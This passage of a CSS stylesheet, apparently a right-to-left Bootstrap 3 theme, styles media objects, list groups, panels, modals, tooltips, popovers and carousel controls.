  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.media {
  margin-top: 15px;
}
.media:first-child {
  margin-top: 0;
}
.media,
.media-body {
  overflow: hidden;
  zoom: 1;
}
.media-body {
  width: 10000px;
}
.media-object {
  display: block;
}
.media-object.img-thumbnail {
  max-width: none;
}
.media-right,
.media > .pull-right {
  padding-right: 10px;
}
.media-left,
.media > .pull-left {
  padding-left: 10px;
}
.media-left,
.media-right,
.media-body {
  display: table-cell;
  vertical-align: top;
}
.media-middle {
  vertical-align: middle;
}
.media-bottom {
  vertical-align: bottom;
}
.media-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.media-list {
  padding-right: 0;
  list-style: none;
}
.list-group {
  padding-right: 0;
  margin-bottom: 20px;
}
.list-group-item {
  position: relative;
  display: block;
  padding: 10px 15px;
  margin-bottom: -1px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
}
.list-group-item:first-child {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.list-group-item:last-child {
  margin-bottom: 0;
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.list-group-item.disabled,
.list-group-item.disabled:hover,
.list-group-item.disabled:focus {
  color: #999999;
  cursor: not-allowed;
  background-color: #eeeeee;
}
.list-group-item.disabled .list-group-item-heading,
.list-group-item.disabled:hover .list-group-item-heading,
.list-group-item.disabled:focus .list-group-item-heading {
  color: inherit;
}
.list-group-item.disabled .list-group-item-text,
.list-group-item.disabled:hover .list-group-item-text,
.list-group-item.disabled:focus .list-group-item-text {
  color: #999999;
}
.list-group-item.active,
.list-group-item.active:hover,
.list-group-item.active:focus {
  z-index: 2;
  color: #ffffff;
  background-color: #cc0000;
  border-color: #cc0000;
}
.list-group-item.active .list-group-item-heading,
.list-group-item.active:hover .list-group-item-heading,
.list-group-item.active:focus .list-group-item-heading,
.list-group-item.active .list-group-item-heading > small,
.list-group-item.active:hover .list-group-item-heading > small,
.list-group-item.active:focus .list-group-item-heading > small,
.list-group-item.active .list-group-item-heading > .small,
.list-group-item.active:hover .list-group-item-heading > .small,
.list-group-item.active:focus .list-group-item-heading > .small {
  color: inherit;
}
.list-group-item.active .list-group-item-text,
.list-group-item.active:hover .list-group-item-text,
.list-group-item.active:focus .list-group-item-text {
  color: #ff9999;
}
a.list-group-item,
button.list-group-item {
  color: #555555;
}
a.list-group-item .list-group-item-heading,
button.list-group-item .list-group-item-heading {
  color: #333333;
}
a.list-group-item:hover,
button.list-group-item:hover,
a.list-group-item:focus,
button.list-group-item:focus {
  color: #555555;
  text-decoration: none;
  background-color: #f5f5f5;
}
button.list-group-item {
  width: 100%;
  text-align: right;
}
.list-group-item-success {
  color: #468847;
  background-color: #dff0d8;
}
a.list-group-item-success,
button.list-group-item-success {
  color: #468847;
}
a.list-group-item-success .list-group-item-heading,
button.list-group-item-success .list-group-item-heading {
  color: inherit;
}
a.list-group-item-success:hover,
button.list-group-item-success:hover,
a.list-group-item-success:focus,
button.list-group-item-success:focus {
  color: #468847;
  background-color: #d0e9c6;
}
a.list-group-item-success.active,
button.list-group-item-success.active,
a.list-group-item-success.active:hover,
button.list-group-item-success.active:hover,
a.list-group-item-success.active:focus,
button.list-group-item-success.active:focus {
  color: #fff;
  background-color: #468847;
  border-color: #468847;
}
.list-group-item-info {
  color: #3a87ad;
  background-color: #d9edf7;
}
a.list-group-item-info,
button.list-group-item-info {
  color: #3a87ad;
}
a.list-group-item-info .list-group-item-heading,
button.list-group-item-info .list-group-item-heading {
  color: inherit;
}
a.list-group-item-info:hover,
button.list-group-item-info:hover,
a.list-group-item-info:focus,
button.list-group-item-info:focus {
  color: #3a87ad;
  background-color: #c4e3f3;
}
a.list-group-item-info.active,
button.list-group-item-info.active,
a.list-group-item-info.active:hover,
button.list-group-item-info.active:hover,
a.list-group-item-info.active:focus,
button.list-group-item-info.active:focus {
  color: #fff;
  background-color: #3a87ad;
  border-color: #3a87ad;
}
.list-group-item-warning {
  color: #c09853;
  background-color: #fcf8e3;
}
a.list-group-item-warning,
button.list-group-item-warning {
  color: #c09853;
}
a.list-group-item-warning .list-group-item-heading,
button.list-group-item-warning .list-group-item-heading {
  color: inherit;
}
a.list-group-item-warning:hover,
button.list-group-item-warning:hover,
a.list-group-item-warning:focus,
button.list-group-item-warning:focus {
  color: #c09853;
  background-color: #faf2cc;
}
a.list-group-item-warning.active,
button.list-group-item-warning.active,
a.list-group-item-warning.active:hover,
button.list-group-item-warning.active:hover,
a.list-group-item-warning.active:focus,
button.list-group-item-warning.active:focus {
  color: #fff;
  background-color: #c09853;
  border-color: #c09853;
}
.list-group-item-danger {
  color: #b94a48;
  background-color: #f2dede;
}
a.list-group-item-danger,
button.list-group-item-danger {
  color: #b94a48;
}
a.list-group-item-danger .list-group-item-heading,
button.list-group-item-danger .list-group-item-heading {
  color: inherit;
}
a.list-group-item-danger:hover,
button.list-group-item-danger:hover,
a.list-group-item-danger:focus,
button.list-group-item-danger:focus {
  color: #b94a48;
  background-color: #ebcccc;
}
a.list-group-item-danger.active,
button.list-group-item-danger.active,
a.list-group-item-danger.active:hover,
button.list-group-item-danger.active:hover,
a.list-group-item-danger.active:focus,
button.list-group-item-danger.active:focus {
  color: #fff;
  background-color: #b94a48;
  border-color: #b94a48;
}
.list-group-item-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.list-group-item-text {
  margin-bottom: 0;
  line-height: 1.3;
}
.panel {
  margin-bottom: 20px;
  background-color: #ffffff;
  border: 1px solid transparent;
  border-radius: 0;
  -webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
}
.panel-body {
  padding: 15px;
}
.panel-heading {
  padding: 10px 15px;
  border-bottom: 1px solid transparent;
  border-top-right-radius: -1;
  border-top-left-radius: -1;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title {
  margin-top: 0;
  margin-bottom: 0;
  font-size: 16px;
  color: inherit;
}
.panel-title > a,
.panel-title > small,
.panel-title > .small,
.panel-title > small > a,
.panel-title > .small > a {
  color: inherit;
}
.panel-footer {
  padding: 10px 15px;
  background-color: #f5f5f5;
  border-top: 1px solid #dddddd;
  border-bottom-left-radius: -1;
  border-bottom-right-radius: -1;
}
.panel > .list-group,
.panel > .panel-collapse > .list-group {
  margin-bottom: 0;
}
.panel > .list-group .list-group-item,
.panel > .panel-collapse > .list-group .list-group-item {
  border-width: 1px 0;
  border-radius: 0;
}
.panel > .list-group:first-child .list-group-item:first-child,
.panel > .panel-collapse > .list-group:first-child .list-group-item:first-child {
  border-top: 0;
  border-top-right-radius: -1;
  border-top-left-radius: -1;
}
.panel > .list-group:last-child .list-group-item:last-child,
.panel > .panel-collapse > .list-group:last-child .list-group-item:last-child {
  border-bottom: 0;
  border-bottom-left-radius: -1;
  border-bottom-right-radius: -1;
}
.panel > .panel-heading + .panel-collapse > .list-group .list-group-item:first-child {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.panel-heading + .list-group .list-group-item:first-child {
  border-top-width: 0;
}
.list-group + .panel-footer {
  border-top-width: 0;
}
.panel > .table,
.panel > .table-responsive > .table,
.panel > .panel-collapse > .table {
  margin-bottom: 0;
}
.panel > .table caption,
.panel > .table-responsive > .table caption,
.panel > .panel-collapse > .table caption {
  padding-left: 15px;
  padding-right: 15px;
}
.panel > .table:first-child,
.panel > .table-responsive:first-child > .table:first-child {
  border-top-right-radius: -1;
  border-top-left-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child {
  border-top-right-radius: -1;
  border-top-left-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:first-child {
  border-top-right-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:last-child {
  border-top-left-radius: -1;
}
.panel > .table:last-child,
.panel > .table-responsive:last-child > .table:last-child {
  border-bottom-left-radius: -1;
  border-bottom-right-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child {
  border-bottom-left-radius: -1;
  border-bottom-right-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:first-child {
  border-bottom-right-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:last-child {
  border-bottom-left-radius: -1;
}
.panel > .panel-body + .table,
.panel > .panel-body + .table-responsive,
.panel > .table + .panel-body,
.panel > .table-responsive + .panel-body {
  border-top: 1px solid #dddddd;
}
.panel > .table > tbody:first-child > tr:first-child th,
.panel > .table > tbody:first-child > tr:first-child td {
  border-top: 0;
}
.panel > .table-bordered,
.panel > .table-responsive > .table-bordered {
  border: 0;
}
.panel > .table-bordered > thead > tr > th:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:first-child,
.panel > .table-bordered > tbody > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:first-child,
.panel > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-bordered > thead > tr > td:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:first-child,
.panel > .table-bordered > tbody > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:first-child,
.panel > .table-bordered > tfoot > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:first-child {
  border-right: 0;
}
.panel > .table-bordered > thead > tr > th:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:last-child,
.panel > .table-bordered > tbody > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:last-child,
.panel > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-bordered > thead > tr > td:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:last-child,
.panel > .table-bordered > tbody > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:last-child,
.panel > .table-bordered > tfoot > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:last-child {
  border-left: 0;
}
.panel > .table-bordered > thead > tr:first-child > td,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > td,
.panel > .table-bordered > tbody > tr:first-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > td,
.panel > .table-bordered > thead > tr:first-child > th,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > th,
.panel > .table-bordered > tbody > tr:first-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > th {
  border-bottom: 0;
}
.panel > .table-bordered > tbody > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > td,
.panel > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-bordered > tbody > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > th,
.panel > .table-bordered > tfoot > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > th {
  border-bottom: 0;
}
.panel > .table-responsive {
  margin-bottom: 0;
  border: 0;
}
.panel-group {
  margin-bottom: 20px;
}
.panel-group .panel {
  margin-bottom: 0;
  border-radius: 0;
}
.panel-group .panel + .panel {
  margin-top: 5px;
}
.panel-group .panel-heading {
  border-bottom: 0;
}
.panel-group .panel-heading + .panel-collapse > .panel-body,
.panel-group .panel-heading + .panel-collapse > .list-group {
  border-top: 1px solid #dddddd;
}
.panel-group .panel-footer {
  border-top: 0;
}
.panel-group .panel-footer + .panel-collapse .panel-body {
  border-bottom: 1px solid #dddddd;
}
.panel-default {
  border-color: #dddddd;
}
.panel-default > .panel-heading {
  color: #444444;
  background-color: #f5f5f5;
  border-color: #dddddd;
}
.panel-default > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #dddddd;
}
.panel-default > .panel-heading .badge {
  color: #f5f5f5;
  background-color: #444444;
}
.panel-default > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #dddddd;
}
.panel-primary {
  border-color: #cc0000;
}
.panel-primary > .panel-heading {
  color: #ffffff;
  background-color: #cc0000;
  border-color: #cc0000;
}
.panel-primary > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #cc0000;
}
.panel-primary > .panel-heading .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.panel-primary > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #cc0000;
}
.panel-success {
  border-color: #d6e9c6;
}
.panel-success > .panel-heading {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.panel-success > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #d6e9c6;
}
.panel-success > .panel-heading .badge {
  color: #dff0d8;
  background-color: #468847;
}
.panel-success > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #d6e9c6;
}
.panel-info {
  border-color: #bce8f1;
}
.panel-info > .panel-heading {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.panel-info > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #bce8f1;
}
.panel-info > .panel-heading .badge {
  color: #d9edf7;
  background-color: #3a87ad;
}
.panel-info > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #bce8f1;
}
.panel-warning {
  border-color: #faebcc;
}
.panel-warning > .panel-heading {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #faebcc;
}
.panel-warning > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #faebcc;
}
.panel-warning > .panel-heading .badge {
  color: #fcf8e3;
  background-color: #c09853;
}
.panel-warning > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #faebcc;
}
.panel-danger {
  border-color: #ebccd1;
}
.panel-danger > .panel-heading {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.panel-danger > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #ebccd1;
}
.panel-danger > .panel-heading .badge {
  color: #f2dede;
  background-color: #b94a48;
}
.panel-danger > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #ebccd1;
}
.well {
  min-height: 20px;
  padding: 19px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border: 1px solid #e3e3e3;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
}
.well blockquote {
  border-color: #ddd;
  border-color: rgba(0, 0, 0, 0.15);
}
.well-lg {
  padding: 24px;
  border-radius: 0;
}
.well-sm {
  padding: 9px;
  border-radius: 0;
}
.close {
  float: left;
  font-size: 21px;
  font-weight: bold;
  line-height: 1;
  color: #000000;
  text-shadow: 0 1px 0 #ffffff;
  filter: alpha(opacity=20);
  opacity: 0.2;
}
.close:hover,
.close:focus {
  color: #000000;
  text-decoration: none;
  cursor: pointer;
  filter: alpha(opacity=50);
  opacity: 0.5;
}
button.close {
  padding: 0;
  cursor: pointer;
  background: transparent;
  border: 0;
  -webkit-appearance: none;
  appearance: none;
}

.modal-open {
  overflow: hidden;
}
.modal {
  position: fixed;
  top: 0;
  left: 0;
  bottom: 0;
  right: 0;
  z-index: 1050;
  display: none;
  overflow: hidden;
  -webkit-overflow-scrolling: touch;
  outline: 0;
}
.modal.fade .modal-dialog {
  -webkit-transform: translate(0, -25%);
  -ms-transform: translate(0, -25%);
  -o-transform: translate(0, -25%);
  transform: translate(0, -25%);
  -webkit-transition: -webkit-transform 0.3s ease-out;
  -moz-transition: -moz-transform 0.3s ease-out;
  -o-transition: -o-transform 0.3s ease-out;
  transition: transform 0.3s ease-out;
}
.modal.in .modal-dialog {
  -webkit-transform: translate(0, 0);
  -ms-transform: translate(0, 0);
  -o-transform: translate(0, 0);
  transform: translate(0, 0);
}
.modal-open .modal {
  overflow-x: hidden;
  overflow-y: auto;
}
.modal-dialog {
  position: relative;
  width: auto;
  margin: 10px;
}
.modal-content {
  position: relative;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #999999;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0;
  -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  outline: 0;
}
.modal-backdrop {
  position: fixed;
  top: 0;
  left: 0;
  bottom: 0;
  right: 0;
  z-index: 1040;
  background-color: #000000;
}
.modal-backdrop.fade {
  filter: alpha(opacity=0);
  opacity: 0;
}
.modal-backdrop.in {
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.modal-header {
  padding: 20px;
  border-bottom: 1px solid #e5e5e5;
}
.modal-header .close {
  margin-top: -2px;
}
.modal-title {
  margin: 0;
  line-height: 1.42857143;
}
.modal-body {
  position: relative;
  padding: 20px;
}
.modal-footer {
  padding: 20px;
  text-align: left;
  border-top: 1px solid #e5e5e5;
}
.modal-footer .btn + .btn {
  margin-bottom: 0;
  margin-right: 5px;
}
.modal-footer .btn-group .btn + .btn {
  margin-right: -1px;
}
.modal-footer .btn-block + .btn-block {
  margin-right: 0;
}
.modal-scrollbar-measure {
  position: absolute;
  top: -9999px;
  width: 50px;
  height: 50px;
  overflow: scroll;
}
@media (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
  .modal-sm {
    width: 300px;
  }
}
@media (min-width: 992px) {
  .modal-lg {
    width: 900px;
  }
}
.tooltip {
  position: absolute;
  z-index: 1030;
  display: block;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-style: normal;
  font-weight: 400;
  line-height: 1.42857143;
  line-break: auto;
  text-align: right;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  word-wrap: normal;
  white-space: normal;
  font-size: 12px;
  filter: alpha(opacity=0);
  opacity: 0;
}
.tooltip.in {
  filter: alpha(opacity=90);
  opacity: 0.9;
}
.tooltip.top {
  padding: 5px 0;
  margin-top: -3px;
}
.tooltip.right {
  padding: 0 5px;
  margin-right: 3px;
}
.tooltip.bottom {
  padding: 5px 0;
  margin-top: 3px;
}
.tooltip.left {
  padding: 0 5px;
  margin-right: -3px;
}
.tooltip.top .tooltip-arrow {
  bottom: 0;
  right: 50%;
  margin-right: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-left .tooltip-arrow {
  left: 5px;
  bottom: 0;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-right .tooltip-arrow {
  bottom: 0;
  right: 5px;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.right .tooltip-arrow {
  top: 50%;
  right: 0;
  margin-top: -5px;
  border-width: 5px 0 5px 5px;
  border-left-color: #000000;
}
.tooltip.left .tooltip-arrow {
  top: 50%;
  left: 0;
  margin-top: -5px;
  border-width: 5px 5px 5px 0;
  border-right-color: #000000;
}
.tooltip.bottom .tooltip-arrow {
  top: 0;
  right: 50%;
  margin-right: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-left .tooltip-arrow {
  top: 0;
  left: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-right .tooltip-arrow {
  top: 0;
  right: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip-inner {
  max-width: 350px;
  padding: 3px 8px;
  color: #ffffff;
  text-align: center;
  background-color: #000000;
  border-radius: 0;
}
.tooltip-arrow {
  position: absolute;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover {
  position: absolute;
  top: 0;
  right: 0;
  z-index: 1010;
  display: none;
  max-width: 276px;
  padding: 1px;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-style: normal;
  font-weight: 400;
  line-height: 1.42857143;
  line-break: auto;
  text-align: right;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  word-wrap: normal;
  white-space: normal;
  font-size: 14px;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #cccccc;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0;
  -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
}
.popover.top {
  margin-top: -10px;
}
.popover.right {
  margin-right: 10px;
}
.popover.bottom {
  margin-top: 10px;
}
.popover.left {
  margin-right: -10px;
}
.popover > .arrow {
  border-width: 11px;
}
.popover > .arrow,
.popover > .arrow:after {
  position: absolute;
  display: block;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover > .arrow:after {
  content: "";
  border-width: 10px;
}
.popover.top > .arrow {
  bottom: -11px;
  right: 50%;
  margin-right: -11px;
  border-top-color: #999999;
  border-top-color: rgba(0, 0, 0, 0.25);
  border-bottom-width: 0;
}
.popover.top > .arrow:after {
  bottom: 1px;
  margin-right: -10px;
  content: " ";
  border-top-color: #ffffff;
  border-bottom-width: 0;
}
.popover.right > .arrow {
  top: 50%;
  right: -11px;
  margin-top: -11px;
  border-left-color: #999999;
  border-left-color: rgba(0, 0, 0, 0.25);
  border-right-width: 0;
}
.popover.right > .arrow:after {
  bottom: -10px;
  right: 1px;
  content: " ";
  border-left-color: #ffffff;
  border-right-width: 0;
}
.popover.bottom > .arrow {
  top: -11px;
  right: 50%;
  margin-right: -11px;
  border-top-width: 0;
  border-bottom-color: #999999;
  border-bottom-color: rgba(0, 0, 0, 0.25);
}
.popover.bottom > .arrow:after {
  top: 1px;
  margin-right: -10px;
  content: " ";
  border-top-width: 0;
  border-bottom-color: #ffffff;
}
.popover.left > .arrow {
  top: 50%;
  left: -11px;
  margin-top: -11px;
  border-left-width: 0;
  border-right-color: #999999;
  border-right-color: rgba(0, 0, 0, 0.25);
}
.popover.left > .arrow:after {
  left: 1px;
  bottom: -10px;
  content: " ";
  border-left-width: 0;
  border-right-color: #ffffff;
}
.popover-title {
  padding: 8px 14px;
  margin: 0;
  font-size: 14px;
  background-color: #f7f7f7;
  border-bottom: 1px solid #ebebeb;
  border-radius: -1 -1 0 0;
}
.popover-content {
  padding: 9px 14px;
}
.carousel {
  position: relative;
}
.carousel-inner {
  position: relative;
  width: 100%;
  overflow: hidden;
}
.carousel-inner > .item {
  position: relative;
  display: none;
  -webkit-transition: 0.6s ease-in-out right;
  -o-transition: 0.6s ease-in-out right;
  transition: 0.6s ease-in-out right;
}
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  line-height: 1;
}
@media all and (transform-3d), (-webkit-transform-3d) {
  .carousel-inner > .item {
    -webkit-transition: -webkit-transform 0.6s ease-in-out;
    -moz-transition: -moz-transform 0.6s ease-in-out;
    -o-transition: -o-transform 0.6s ease-in-out;
    transition: transform 0.6s ease-in-out;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    -webkit-perspective: 1000px;
    -moz-perspective: 1000px;
    perspective: 1000px;
  }
  .carousel-inner > .item.next,
  .carousel-inner > .item.active.right {
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
    right: 0;
  }
  .carousel-inner > .item.prev,
  .carousel-inner > .item.active.left {
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
    right: 0;
  }
  .carousel-inner > .item.next.left,
  .carousel-inner > .item.prev.right,
  .carousel-inner > .item.active {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    right: 0;
  }
}
.carousel-inner > .active,
.carousel-inner > .next,
.carousel-inner > .prev {
  display: block;
}
.carousel-inner > .active {
  right: 0;
}
.carousel-inner > .next,
.carousel-inner > .prev {
  position: absolute;
  top: 0;
  width: 100%;
}
.carousel-inner > .next {
  right: 100%;
}
.carousel-inner > .prev {
  right: -100%;
}
.carousel-inner > .next.left,
.carousel-inner > .prev.right {
  right: 0;
}
.carousel-inner > .active.left {
  right: -100%;
}
.carousel-inner > .active.right {
  right: 100%;
}
.carousel-control {
  position: absolute;
  top: 0;
  bottom: 0;
  right: 0;
  width: 15%;
  font-size: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
  background-color: rgba(0, 0, 0, 0);
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.carousel-control.left {
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1);
  background-repeat: repeat-x;
}
.carousel-control.right {
  left: 0;
  right: auto;
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1);
  background-repeat: repeat-x;
}
.carousel-control:hover,
.carousel-control:focus {
  color: #ffffff;
  text-decoration: none;
  outline: 0;
  filter: alpha(opacity=90);
  opacity: 0.9;
}
.carousel-control .icon-prev,
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-left,
.carousel-control .glyphicon-chevron-right {
  position: absolute;
  top: 50%;
  z-index: 5;
  display: inline-block;
  margin-top: -10px;
}
.carousel-control .icon-prev,
.carousel-control .glyphicon-chevron-left {
  right: 50%;
  margin-right: -10px;
}
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-right {
  left: 50%;
  margin-left: -10px;
}
.carousel-control .icon-prev,
.carousel-control .icon-next {
  width: 20px;
  height: 20px;
  font-family: serif;
  line-height: 1;
}
.carousel-control .icon-prev:before {
  content: "\2039";
}
.carousel-control .icon-next:before {
  content: "\203a";
}
.carousel-indicators {
  position: absolute;
  bottom: 10px;
  right: 50%;
  z-index: 15;
  width: 60%;
  padding-right: 0;
  margin-right: -30%;
  text-align: center;
  list-style: none;
}
.carousel-indicators li {
  display: inline-block;
  width: 10px;
  height: 10px;
  margin: 1px;
  text-indent: -999px;
  cursor: pointer;
